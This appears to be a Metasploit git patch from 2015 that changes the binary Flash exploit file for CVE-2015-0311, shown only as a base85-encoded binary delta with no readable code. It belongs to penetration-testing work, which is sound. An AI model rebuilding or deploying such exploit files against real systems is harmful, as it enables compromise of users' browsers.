zJej}gp$IRyma!Z1ftW8IhHvg@fI9M$oHED@8Df6IvFd9l!6fCpZn4Q+zmlRm>Wc~N
z<{jhj+k0AGl!v8Qks`SL&+({?P4}I~dH7RR`!<H)TXT`yXVl!tXO3M5sBrn=-kdPd
zn6oG1?G3*Ne|cvc`M__%ZTY2Mk=EkK5<QlffINRd$_J*Ab&F?zWs_l-Ds(H8IZJH;
zkP3(}YxQws$iKO42#e1nbo%DLRZ(<tfY3QaKapsMXpE1V0soFY@x38}qO)IT7t+6V
zlQF?ukC~alNG7pHdi8%LT`e3mRAfWPUM&`!xFSIme-RPw2i>g=LA(C42yr<Z7hL=_
z#}ynK3pK4XHNxN^-yh14bOSQu19s-|(-eP&F;~PpG{36##BDYo%aD@Kw*ZG1)WDkG
z*Q=eiyyiIpOp3|JBt63vA~$(;FNHVoz3>+DKI-(iVKT)(Q`MZyFumQyeg)V@_|pJ<
zo|X*ZfBD9gUiBXs@=k!J^g<2*1)*BL6|kNs08T}v&i<o%-S@^6)3k~4<=DnIWTkun
zMNS8tS%##6b+6n=Hch;u=Z!mUyfCx8Yh?QKqq;T^`CZ$U0-c9!V@xXnK~?%dx}PPp
w#VM*Nt?=SPERvxFC&RY2PlM0D0VeH-W+ZX-5a#k|YMnkf<^L&K|Nes9v(Fwt<^TWy


From fb8a927941642f3417313a7b9e596313004889eb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 14:20:43 -0500
Subject: [PATCH 0192/1013] Hardcode params

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20391 -> 20417 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index 1859166717e68a7ee652eeac54c667c7de9f34f5..2af1bcae87d26c5512e73c560154364dfa41162f 100644
GIT binary patch
delta 20294
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
